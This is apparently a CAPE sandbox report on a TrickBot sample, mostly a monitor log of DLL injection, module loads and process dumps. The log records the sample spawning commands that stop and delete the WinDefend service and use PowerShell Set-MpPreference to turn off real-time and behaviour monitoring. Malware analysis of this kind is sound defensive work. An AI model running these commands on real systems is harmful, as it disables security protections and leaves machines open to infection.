CAPE

Detections: TrickBot > Triggered CAPE Tasks > Task #87754: TrickBot

Analysis

Category  Package  Started              Completed            Duration
FILE      exe      2019-08-13 22:41:12  2019-08-13 22:45:18  246 seconds

Options:
route = internet
procdump = 1

Log:
2019-08-13 23:41:13,000 [root] INFO: Date set to: 08-13-19, time set to: 22:41:13, timeout set to: 200
2019-08-13 23:41:13,015 [root] DEBUG: Starting analyzer from: C:\jyguetdlo
2019-08-13 23:41:13,015 [root] DEBUG: Storing results at: C:\bbTJiLOfj
2019-08-13 23:41:13,015 [root] DEBUG: Pipe server name: \\.\PIPE\mhKdbgZcE
2019-08-13 23:41:13,015 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-08-13 23:41:13,015 [root] INFO: Automatically selected analysis package "exe"
2019-08-13 23:41:13,546 [root] DEBUG: Started auxiliary module Browser
2019-08-13 23:41:13,546 [root] DEBUG: Started auxiliary module Curtain
2019-08-13 23:41:13,546 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-08-13 23:41:14,730 [modules.auxiliary.digisig] DEBUG: File is not signed.
2019-08-13 23:41:14,730 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-08-13 23:41:14,730 [root] DEBUG: Started auxiliary module DigiSig
2019-08-13 23:41:14,746 [root] DEBUG: Started auxiliary module Disguise
2019-08-13 23:41:14,746 [root] DEBUG: Started auxiliary module Human
2019-08-13 23:41:14,746 [root] DEBUG: Started auxiliary module Screenshots
2019-08-13 23:41:14,746 [root] DEBUG: Started auxiliary module Sysmon
2019-08-13 23:41:14,746 [root] DEBUG: Started auxiliary module Usage
2019-08-13 23:41:14,746 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2019-08-13 23:41:14,746 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2019-08-13 23:41:14,778 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\exlxo5YyAuKqn.exe" with arguments "" with pid 740
2019-08-13 23:41:14,778 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:14,778 [lib.api.process] INFO: 32-bit DLL to inject is C:\jyguetdlo\dll\lvVhLs.dll, loader C:\jyguetdlo\bin\VjcJHVr.exe
2019-08-13 23:41:14,809 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:14,809 [root] DEBUG: Loader: Injecting process 740 (thread 164) with C:\jyguetdlo\dll\lvVhLs.dll.
2019-08-13 23:41:14,809 [root] DEBUG: Process image base: 0x00400000
2019-08-13 23:41:14,809 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\lvVhLs.dll.
2019-08-13 23:41:14,825 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0048E000 - 0x77110000
2019-08-13 23:41:14,825 [root] DEBUG: InjectDllViaIAT: Allocated 0x112c bytes for new import table at 0x00490000.
2019-08-13 23:41:14,825 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:14,825 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\lvVhLs.dll.
2019-08-13 23:41:14,825 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 740
2019-08-13 23:41:16,836 [lib.api.process] INFO: Successfully resumed process with pid 740
2019-08-13 23:41:16,836 [root] INFO: Added new process to list with pid: 740
2019-08-13 23:41:16,852 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:16,852 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:16,914 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:16,914 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:16,914 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:16,914 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:16,914 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:16,914 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 740 at 0x747e0000, image base 0x400000, stack from 0x286000-0x290000
2019-08-13 23:41:16,914 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\exlxo5YyAuKqn.exe".
2019-08-13 23:41:16,914 [root] INFO: Monitor successfully loaded in process with pid 740.
2019-08-13 23:41:16,914 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-08-13 23:41:16,914 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-08-13 23:41:16,914 [root] DEBUG: DLL loaded at 0x749B0000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-08-13 23:41:16,914 [root] DEBUG: DLL loaded at 0x749A0000: C:\Windows\system32\profapi (0xb000 bytes).
2019-08-13 23:41:16,977 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2019-08-13 23:41:16,977 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-08-13 23:41:16,977 [root] DEBUG: DLL loaded at 0x742A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-08-13 23:41:17,009 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-08-13 23:41:17,009 [root] DEBUG: DLL loaded at 0x749D0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-08-13 23:41:17,023 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-08-13 23:41:17,055 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2019-08-13 23:41:17,086 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-08-13 23:41:17,101 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-08-13 23:41:17,118 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-08-13 23:41:17,118 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-08-13 23:41:17,180 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-08-13 23:41:17,180 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-08-13 23:41:17,180 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-08-13 23:41:17,180 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-08-13 23:41:17,196 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-08-13 23:41:17,226 [root] INFO: Announced 32-bit process name: ропрУВаЫсенорх.exe pid: 2352
2019-08-13 23:41:17,226 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,226 [lib.api.process] INFO: 32-bit DLL to inject is C:\jyguetdlo\dll\lvVhLs.dll, loader C:\jyguetdlo\bin\VjcJHVr.exe
2019-08-13 23:41:17,226 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,226 [root] DEBUG: Loader: Injecting process 2352 (thread 2216) with C:\jyguetdlo\dll\lvVhLs.dll.
2019-08-13 23:41:17,226 [root] DEBUG: Process image base: 0x00400000
2019-08-13 23:41:17,226 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\lvVhLs.dll.
2019-08-13 23:41:17,226 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0048E000 - 0x77110000
2019-08-13 23:41:17,226 [root] DEBUG: InjectDllViaIAT: Allocated 0x112c bytes for new import table at 0x00490000.
2019-08-13 23:41:17,226 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,226 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\lvVhLs.dll.
2019-08-13 23:41:17,226 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2352
2019-08-13 23:41:17,226 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:17,226 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,226 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,226 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,243 [root] DEBUG: DLL unloaded from 0x74440000.
2019-08-13 23:41:17,243 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 740
2019-08-13 23:41:17,243 [root] DEBUG: GetHookCallerBase: thread 164 (handle 0x0), return address 0x00407CB7, allocation base 0x00400000.
2019-08-13 23:41:17,243 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-08-13 23:41:17,243 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:17,243 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2352 at 0x747e0000, image base 0x400000, stack from 0x286000-0x290000
2019-08-13 23:41:17,243 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\ProgramData\??????????????.exe".
2019-08-13 23:41:17,243 [root] INFO: Added new process to list with pid: 2352
2019-08-13 23:41:17,243 [root] INFO: Monitor successfully loaded in process with pid 2352.
2019-08-13 23:41:17,243 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-08-13 23:41:17,243 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-08-13 23:41:17,243 [root] DEBUG: DumpProcess: Module entry point VA is 0x000014E0.
2019-08-13 23:41:17,243 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-08-13 23:41:17,243 [root] DEBUG: DLL loaded at 0x749B0000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-08-13 23:41:17,243 [root] DEBUG: DLL loaded at 0x749A0000: C:\Windows\system32\profapi (0xb000 bytes).
2019-08-13 23:41:17,257 [root] DEBUG: set_caller_info: Adding region at 0x003E0000 to caller regions list (ntdll::LdrLoadDll).
2019-08-13 23:41:17,257 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-08-13 23:41:17,257 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-08-13 23:41:17,257 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\740_1376438991171214382019
2019-08-13 23:41:17,257 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x82400.
2019-08-13 23:41:17,257 [root] DEBUG: DLL unloaded from 0x75140000.
2019-08-13 23:41:17,257 [root] DEBUG: DLL unloaded from 0x749D0000.
2019-08-13 23:41:17,257 [root] INFO: Notified of termination of process with pid 740.
2019-08-13 23:41:17,351 [root] DEBUG: DLL unloaded from 0x75790000.
2019-08-13 23:41:17,382 [root] DEBUG: set_caller_info: Adding region at 0x01E60000 to caller regions list (ntdll::LdrLoadDll).
2019-08-13 23:41:17,398 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2019-08-13 23:41:17,398 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-08-13 23:41:17,398 [root] DEBUG: DLL loaded at 0x741A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-08-13 23:41:17,414 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-08-13 23:41:17,430 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-08-13 23:41:17,460 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:17,507 [root] DEBUG: DLL loaded at 0x74960000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:17,523 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-08-13 23:41:17,555 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-08-13 23:41:17,569 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-08-13 23:41:17,585 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-08-13 23:41:17,601 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-08-13 23:41:17,601 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-08-13 23:41:17,601 [root] DEBUG: DLL loaded at 0x749D0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-08-13 23:41:17,601 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-08-13 23:41:17,617 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-08-13 23:41:17,648 [root] INFO: Announced 64-bit process name: cmd.exe pid: 1092
2019-08-13 23:41:17,648 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,648 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,680 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,680 [root] DEBUG: Loader: Injecting process 1092 (thread 1276) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,694 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:17,694 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,694 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:17,710 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:17,742 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,742 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,742 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1092
2019-08-13 23:41:17,757 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:17,757 [root] DEBUG: DLL unloaded from 0x74340000.
2019-08-13 23:41:17,757 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-08-13 23:41:17,757 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:17,757 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,773 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,773 [root] DEBUG: DLL loaded at 0x724F0000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:17,773 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:17,773 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,773 [root] INFO: Announced 64-bit process name: cmd.exe pid: 2872
2019-08-13 23:41:17,789 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,789 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,789 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,789 [root] DEBUG: Loader: Injecting process 2872 (thread 2840) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,789 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:17,789 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,803 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:17,803 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:17,803 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,803 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,803 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2872
2019-08-13 23:41:17,803 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:17,803 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:17,803 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:17,803 [root] DEBUG: DLL unloaded from 0x724F0000.
2019-08-13 23:41:17,803 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:17,819 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:17,819 [root] DEBUG: DLL loaded at 0x74960000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:17,819 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,819 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,819 [root] INFO: Announced 64-bit process name: cmd.exe pid: 1544
2019-08-13 23:41:17,819 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,819 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,819 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,819 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:17,835 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:17,835 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,835 [root] DEBUG: Loader: Injecting process 1544 (thread 1460) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,835 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:17,835 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:17,835 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:17,835 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,835 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1092 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000094000-0x0000000000190000
2019-08-13 23:41:17,835 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2872 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000204000-0x0000000000300000
2019-08-13 23:41:17,835 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:17,835 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c sc stop WinDefend.
2019-08-13 23:41:17,835 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c sc delete WinDefend.
2019-08-13 23:41:17,835 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:17,835 [root] INFO: Added new process to list with pid: 1092
2019-08-13 23:41:17,835 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,835 [root] INFO: Monitor successfully loaded in process with pid 1092.
2019-08-13 23:41:17,835 [root] INFO: Added new process to list with pid: 2872
2019-08-13 23:41:17,835 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,835 [root] INFO: Monitor successfully loaded in process with pid 2872.
2019-08-13 23:41:17,835 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1544
2019-08-13 23:41:17,851 [root] INFO: Process with pid 740 has terminated
2019-08-13 23:41:17,851 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:17,851 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-08-13 23:41:17,851 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:17,851 [root] DEBUG: DLL loaded at 0x724F0000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:17,851 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:17,851 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,851 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,851 [root] INFO: Announced 64-bit process name: cmd.exe pid: 2132
2019-08-13 23:41:17,851 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,851 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,851 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,867 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:17,867 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,867 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:17,867 [root] DEBUG: Loader: Injecting process 2132 (thread 2156) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,867 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:17,867 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:17,867 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,867 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1544 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x0000000000214000-0x0000000000310000
2019-08-13 23:41:17,867 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:17,881 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c powershell Set-MpPreference -DisableRealtimeMonitoring $true.
2019-08-13 23:41:17,881 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:17,881 [root] INFO: Added new process to list with pid: 1544
2019-08-13 23:41:17,881 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:17,881 [root] INFO: Monitor successfully loaded in process with pid 1544.
2019-08-13 23:41:17,881 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,881 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2132
2019-08-13 23:41:17,881 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-08-13 23:41:17,881 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:17,881 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:17,881 [root] DEBUG: DLL unloaded from 0x724F0000.
2019-08-13 23:41:17,881 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-08-13 23:41:17,881 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:17,898 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:17,898 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\SysWOW64\ieframe (0xa80000 bytes).
2019-08-13 23:41:17,898 [root] DEBUG: DLL loaded at 0x74960000: C:\Windows\SysWOW64\OLEACC (0x3c000 bytes).
2019-08-13 23:41:17,898 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:17,898 [root] INFO: Announced 64-bit process name: sc.exe pid: 2244
2019-08-13 23:41:17,898 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:17,898 [root] INFO: Announced 64-bit process name: cmd.exe pid: 2208
2019-08-13 23:41:17,898 [root] INFO: Announced 64-bit process name: sc.exe pid: 1788
2019-08-13 23:41:17,898 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:17,898 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,914 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,914 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:17,914 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,914 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:17,914 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,914 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,914 [root] INFO: Announced 64-bit process name: powershell.exe pid: 1628
2019-08-13 23:41:17,914 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2132 at 0x0000000074460000, image base 0x0000000049D90000, stack from 0x00000000000F4000-0x00000000001F0000
2019-08-13 23:41:17,914 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,914 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,914 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,914 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c powershell Set-MpPreference -DisableBehaviorMonitoring $true.
2019-08-13 23:41:17,914 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:17,914 [root] DEBUG: Loader: Injecting process 2244 (thread 2328) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,914 [root] DEBUG: Loader: Injecting process 2208 (thread 2212) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,914 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:17,914 [root] INFO: Added new process to list with pid: 2132
2019-08-13 23:41:17,914 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,914 [root] DEBUG: Process image base: 0x00000000FF730000
2019-08-13 23:41:17,914 [root] DEBUG: Process image base: 0x0000000049D90000
2019-08-13 23:41:17,914 [root] INFO: Monitor successfully loaded in process with pid 2132.
2019-08-13 23:41:17,914 [root] DEBUG: Loader: Injecting process 1788 (thread 1648) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,914 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,914 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,914 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:17,928 [root] DEBUG: Process image base: 0x00000000FF730000
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF73F000 - 0x000007FEFF430000
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x0000000049DE9000 - 0x0000000077110000
2019-08-13 23:41:17,928 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:17,928 [root] DEBUG: Loader: Injecting process 1628 (thread 2320) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Allocated 0x1dc bytes for new import table at 0x00000000FF740000.
2019-08-13 23:41:17,928 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c0 bytes for new import table at 0x0000000049DF0000.
2019-08-13 23:41:17,928 [root] INFO: Announced 64-bit process name: powershell.exe pid: 2952
2019-08-13 23:41:17,928 [root] DEBUG: Process image base: 0x000000013F390000
